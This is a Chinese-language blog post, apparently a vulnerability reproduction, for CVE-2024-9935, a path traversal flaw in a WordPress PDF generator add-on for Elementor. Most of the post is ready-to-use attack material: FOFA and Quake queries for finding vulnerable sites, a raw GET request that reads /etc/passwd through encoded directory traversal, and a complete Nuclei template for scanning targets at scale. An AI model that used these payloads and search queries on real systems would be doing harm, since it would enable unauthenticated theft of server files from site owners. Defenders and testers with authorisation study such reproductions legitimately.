【漏洞复现】CVE-2024-9935
【漏洞复现】CVE-2024-9935
混子Hacker 混子Hacker 2024-12-04 13:17
免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不承担任何法律及连带责任。
[
漏洞简介
]
——
道阻且长,行则将至;行而不辍,未来可期 ——
CVE-2024-9935
WordPress 的 Elementor Page Builder 插件的 PDF 生成器插件在 1.7.5 之前的所有版本中都容易受到路径遍历的攻击,包括 1.7.5 rtw_pgaepb_dwnld_pdf() 函数。这使得未经身份验证的攻击者能够读取服务器上任意文件的内容,其中可能包含敏感信息。
漏洞信息
混子Hacker
01
资产测绘
fofa: body="wp-content/plugins/pdf-generator-addon-for-elementor-page-builder/"
Quake:body:"wp-content/plugins/pdf-generator-addon-for-elementor-page-builder/"
混子Hacker**
02
漏洞复现
GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: xxx
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
混子Hacker**
03
Nuclei Poc
id: CVE-2024-9935
info:
name: PDF Generator Addon for Elementor Page Builder <= 1.7.5 - Arbitrary File Download
author: s4e-io
severity: high
description: |
The PDF Generator Addon for Elementor Page Builder plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.7.5 via the rtw_pgaepb_dwnld_pdf() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.
reference:
- https://github.com/RandomRobbieBF/CVE-2024-9935
- https://plugins.trac.wordpress.org/browser/pdf-generator-addon-for-elementor-page-builder/trunk/public/class-pdf-generator-addon-for-elementor-page-builder-public.php#L133
- https://www.wordfence.com/threat-intel/vulnerabilities/id/36daf2af-1db3-4b35-8849-480212660b2f?source=cve
- https://nvd.nist.gov/vuln/detail/CVE-2024-9935
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-9935
cwe-id: CWE-22
epss-score: 0.0009
epss-percentile: 0.39758
metadata:
verified: true
max-request: 2
vendor: RedefiningTheWeb
product: pdf-generator-addon-for-elementor-page-builder
framework: wordpress
fofa-query: body="wp-content/plugins/pdf-generator-addon-for-elementor-page-builder/"
tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,pdf-generator
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins/pdf-generator-addon-for-elementor-page-builder")'
internal: true
- raw:
- |
GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- regex('root:.*:0:0:', body)
- contains(header, "application/pdf")
- status_code == 200
condition: and
<<<
END
原创文章|转载请附上原文出处链接
更多漏洞|关注作者查看
作者|混子Hacker